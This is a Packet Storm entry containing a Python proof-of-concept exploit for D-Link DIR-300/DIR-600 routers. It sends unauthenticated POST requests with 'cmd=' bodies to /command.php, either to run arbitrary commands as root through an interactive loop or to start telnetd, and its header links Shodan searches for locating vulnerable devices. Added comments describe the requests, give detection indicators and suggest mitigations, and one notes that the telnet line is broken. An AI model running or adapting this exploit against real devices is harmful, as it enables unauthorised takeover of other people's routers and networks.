D-LINK DIR-300 / DIR-600 Remote Root

2013-02-08T00:00:00
ID PACKETSTORM:120171
Type packetstorm
Reporter infodox
Modified 2013-02-08T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# D-LINK TOTAL FAIL  
# http://www.s3cur1ty.de/m1adv2013-003  
# Another Shit PoC by infodox  
# SHODANS BELOW  
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300  
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600  
# Who knew a shell could be so easy?  
import sys  
import requests  
import os  
  
# Argument handling: exactly two command-line arguments are required, a
# target host and a mode string. With any other argument count the script
# prints its usage text and exits with status 0.
# NOTE(review): the original indentation was lost when this page was
# extracted, so the nesting of the statements below is inferred.
if len(sys.argv) != 3:  
print "Usage: ./dlinkroot.py <target> <mode>"  
print "Modes: shell or telnetenable"  
print "I was lazy so I assume you have a telnet client"  
sys.exit(0)  
  
# Both values are taken verbatim from the command line; no validation is
# applied to either one before use.
target = sys.argv[1]  
mode = sys.argv[2]  
  
# shell(target): loop that reads a line from the operator, wraps it as the
# POST body "cmd=<line>;" and sends it to http://<target>/command.php, then
# prints the HTTP response text.
#
# What this shows about the device: the request is built from a URL and a
# body only. No credentials, cookie or session token are attached, so the
# script relies on command.php acting on the "cmd" parameter for an
# unauthenticated caller (the page title describes the result as remote
# root; see the advisory URL in the file header).
#
# Defender notes:
# - Observable: an HTTP POST to /command.php whose body begins with "cmd=".
#   The typed line is inserted into the body verbatim (no URL-encoding is
#   done by this script), so signatures should not assume encoded input.
# - Exposure: any network that can reach the device's web interface can
#   send this request. Keeping the management interface off untrusted
#   networks and checking the vendor for firmware that addresses the
#   referenced advisory are the relevant mitigations.
#
# NOTE(review): indentation was lost in extraction; the try/except is
# presumably inside the while loop.
def shell(target):  
print "[+] Connecting and spawning a shell..."  
while True:  
try:  
# Prompt is cosmetic: it only formats the target into a shell-like string.
bobcat = raw_input("%s:~# " %(target))  
lulz = "cmd=%s;" %(bobcat)  
url = "http://" + target + "/command.php"  
# Second positional argument of requests.post is the request body.
hax = requests.post(url, lulz)  
print hax.text  
# Only Ctrl-C is handled here; it exits with status 1. No other exception
# type is caught in this function.
except KeyboardInterrupt:  
print "\n[-] Quitting"  
sys.exit(1)  
  
# telnetenable(target): sends one fixed request, the POST body
# "cmd=telnetd;" to http://<target>/command.php, prints the response text,
# and then tries to run a local telnet client.
#
# As in shell(), the request carries no credentials; it depends on the
# device executing the "cmd" value for an unauthenticated caller.
#
# Defender notes:
# - Observable: a POST to /command.php with the body "cmd=telnetd;",
#   followed by a telnet service appearing on the device (presumably on
#   the default telnet port; the script does not specify one).
# - A telnet listener that was not enabled by the administrator is a
#   persistence indicator worth checking for on affected models, even
#   after the web interface has been restricted.
#
# NOTE(review): indentation was lost in extraction; the two try/except
# blocks are presumably sequential, with the second print between them.
def telnetenable(target):  
lulz = "cmd=telnetd;"  
url = "http://" + target + "/command.php"  
print "[+] Trying to enable telnet"  
try:  
hax = requests.post(url, lulz)  
print hax.text  
# Any exception from the HTTP request ends the script with status 0.
except Exception:  
print "[-] IT FAILED IT!"  
sys.exit(0)  
print "[+] Doing a telnet"  
try:  
# NOTE(review): as written, the % operator is applied to the return value
# of os.system(), not to the command string, so the string handed to the
# local shell is the literal 'telnet %s'.
os.system('telnet %s') %(target)  
# Any exception from the line above ends the script with status 1.
except Exception:  
print "[-] IT FAILED IT!"  
sys.exit(1)  
  
# Mode dispatch: the second command-line argument selects shell() or
# telnetenable(). Any other value only prints a message; there is no
# explicit exit call in that branch.
if mode == "shell":  
shell(target)  
elif mode == "telnetenable":  
telnetenable(target)  
else:  
print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"  
`